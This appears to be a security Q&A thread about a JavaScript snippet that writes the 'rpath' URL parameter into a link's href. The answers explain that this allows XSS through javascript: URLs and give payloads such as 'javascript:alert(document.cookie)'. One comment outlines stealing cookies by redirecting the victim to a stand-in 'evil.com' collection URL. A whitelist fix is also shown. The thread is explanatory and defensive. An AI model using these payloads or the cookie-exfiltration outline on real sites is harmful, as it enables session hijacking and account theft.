# JS code vulnerable?

Tags: javascript

Can you please help me in order to understand what exactly do this code and if it is could be vulernerable?

```
<script type="text/javascript">

        function getUrlVars(){

            var vars = [], hash;
            var hashes = window.location.href.slice(window.location.href.indexOf('?') + 1).split('&');
            for(var i = 0; i < hashes.length; i++)
            {
                hash = hashes[i].split('=');
                vars.push(hash[0]);
                vars[hash[0]] = hash[1];
            }
            return vars;
        }

        var get_parameters = getUrlVars();
        if(get_parameters['rpath'] != undefined && get_parameters['rpath'] != 'default'){
            var redirectPath = get_parameters['rpath'];
            document.getElementById('redirectpg').href = redirectPath;
        }else{

            document.getElementById('redirectpg').href = "index.php";

        }

    </script>
```

Comment: Vulnerable for what kind of attack?

Comment: XSS or path traversal?

Answer (score 3):

Yes, this code seems to be vulnerable to an XSS injection.

**What does this code do?**

It checks the URL the user typed for GET-arguments. GET-arguments are everything behind a question-mark and are typical a bunch of key/value pairs with an equal-sign between them separated by `&`.

In this example URL

```
 http://example.com/somesite.html?somevar=42&rpath=someothersite.html
```

the argument there are two such variables. `somevar = 42` and `rpath = someothersite.html`

Your script will then search for a specific link on your website, take the value of `rpath`, and replace the target of the link with it. In this example, that link would then be changed to point to `someothersite.html`.

**How could this be abused?**

A link on a website can not just point to another website. It is also possible to have links which start with `javascript:` followed by javascript code. When a user clicks on this link, that code would get executed in the context of the currently loaded website.

That means an attacker could send the user a link like this:

```
http://example.com/somesite.html?rpath=javascript:alert('hello world')
```

When the user would click on that link and then on the redirect-link on your website, that javascript code would get execute.

**Why is this a problem?**

The current website might contain sensitive information. A javascript executed in the context of that website can grab that information and send it to a server the attacker controls.

The script also has access to any cookies and the users localstorage. When you use cookies to track user sessions, an attacker could have the script send the users cookie to his server. This might allow to hijack the session of the user and take over their account.

Depending on what your website actually does, there could also be a lot of other ways an attacker could cause all kinds of mischief by tricking users into executing javascript code.

**How could this be done better?**

Putting unfiltered user-data into a HTML document is always dangerous. In this case you might think that it might be sufficient to just reject any arguments containing `javascript:`, but the exploit shown above is only the most obvious one. There are likely much more subtile ones. Trying to filter anything that might be evil seems to be beyond the programming skill of the author of above code snippet, so I would advise against trying it. Instead I would recommend them to take a much safer approach. Instead of just putting any string in the website the user provides, have a limited set of possible strings to insert and choose one depending on the argument provided:

```
switch(redirectPath) {
    case 'home':
        document.getElementById('redirectpg').href = 'home.php';
        break;
    case 'about':
        document.getElementById('redirectpg').href = 'about.php';
        break;
    case 'contact':
        document.getElementById('redirectpg').href = 'contact.php';
        break;
    default:
        document.getElementById('redirectpg').href =  'index.php';
        break;
}
```

Comment: I tried the test you have suggested me and in fact it's works:javascript:alert('hello world') and javascript:alert(document.cookie) . But why this not works? <scritp>alert('test')</script>

Comment: @purcel First, you misspelled `<script>`. Second, HTML doesn't allow tags in attributes (like `href`).

Comment: @purcel The content of `href` is supposed to be `protocol:payload`. If it's an HTTP link, the `href` will be `http://www.example.com`, and if it's FTP, it should be `ftp:example.com/directory`,and if it's JavaScript code it should be `javascript:someCode()`, you get the idea. In this case, the "protocol" (not actually a protocol) is the `javascript` and the payload is the actual JavaScript code. So, to inject in the `href` tag, you have to use the `javascript:` format as no other format will work.

Comment: I am testing a custom webapp following the OWASP methodology. There is a way to steal cookie and send to "my server" with `javascript:` format?

Comment: @purcel Yes, but that's a different question and too specific to be asked here. However, the main idea is that you can insert a new script tag (using `document.createElement('script')`) and set its `src` to a URL pointing to a `.js` file of your choice. With that, you have the freedom to include the more code for your payload. For example, you can redirect the user to a URL `http://evil.com/submit.php?cookie=`.

Answer (score 3):

**Yes, it's vulnerable to XSS.** A simple exploit would be something like this:

`example.com/index.php?rpath=javascript:alert(document.cookie)`

The `rpath` parameter will be grabbed by your `getUrlVars()` function and be assigned to `redirectPath`. The element `redirectpg` will have its `href` attribute changed to the XSS code. When the user clicks on the `redirectpg` element (presumably an anchor `<a>`), the malicious JavaScript code will be executed.

This can lead to cookie theft and impersonating a legitimate user, and probably re-render the login form and steal the actual password of the user. Basically, the attacker is able to show the user anything they want within your website.